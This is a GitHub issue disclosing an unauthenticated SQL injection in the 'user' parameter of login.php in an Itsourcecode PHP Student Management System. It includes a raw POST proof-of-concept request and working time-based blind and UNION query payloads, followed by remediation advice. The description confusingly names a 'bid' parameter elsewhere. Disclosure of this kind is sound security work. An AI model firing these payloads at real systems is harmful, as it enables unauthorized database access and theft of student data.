Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Itsourcecode "Student Management System " in PHP 1.0 "login.php" SQL injection #3

Open
HryspaHodor opened this issue Jun 18, 2024 · 0 comments

Comments

@HryspaHodor
Copy link
Owner

Itsourcecode "Student Management System " in PHP 1.0 "login.php" SQL injection

NAME OF AFFECTED PRODUCT(S)

  • Student Management System In PHP With Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • HryspaHodor

Vulnerable File

  • login.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was found in the 'login.php' file of the 'Student Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "user" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • During the security review of the PHP "Student Management System", "xxx" discovered a critical SQL injection vulnerability in the "login.php" file. This vulnerability stems from insufficient user input validation of the "bid" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

No login or authorization is required to exploit this vulnerability

Vulnerability details and POC

POST /login.php HTTP/1.1
Host: 192.168.1.127:93
Content-Length: 12
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.127:93
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.127:93/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: pma_lang=zh_CN; phpMyAdmin=n1j57l61g1ceh862p94qofqk7m; pmaUser-1=%7B%22iv%22%3A%22tjtCcom5CUpD322JTcChhQ%3D%3D%22%2C%22mac%22%3A%22ad530f6b914fdd90e727b9bd8b7994227d0f52fd%22%2C%22payload%22%3A%22ahs1n8o7EMQJSdQ6XWnt6g%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%229kvyg5UT2Q%2BPDIVUegJk2w%3D%3D%22%2C%22mac%22%3A%228cff0fa4cd30a6d3b2f17c169e4c5a6e764ff5c0%22%2C%22payload%22%3A%22rQA8q%5C%2FOvYb6kQACbQGpPk8CiHSLk5gPdPzsaEeCAg%5C%2F0%3D%22%7D; PHPSESSID=opccc8f8374pmnvm7tbd4lm1m3
Connection: keep-alive

user=1&pwd=1

Vulnerability type:

  • time-based blind
  • UNION query

Vulnerability location:

  • 'user' parameter

Payload:

Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6736 FROM (SELECT(SLEEP(5)))vEuN) AND 'XHkx'='XHkx&pwd=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: user=1' UNION ALL SELECT 26,26,CONCAT(0x71786b7a71,0x4f4c41566d695375536e7245546b4f624758684b6f4a444c77456c57484e6a4179704b444451426a,0x7171717671),26,26,26-- -&pwd=1

1

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

3
2
4

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant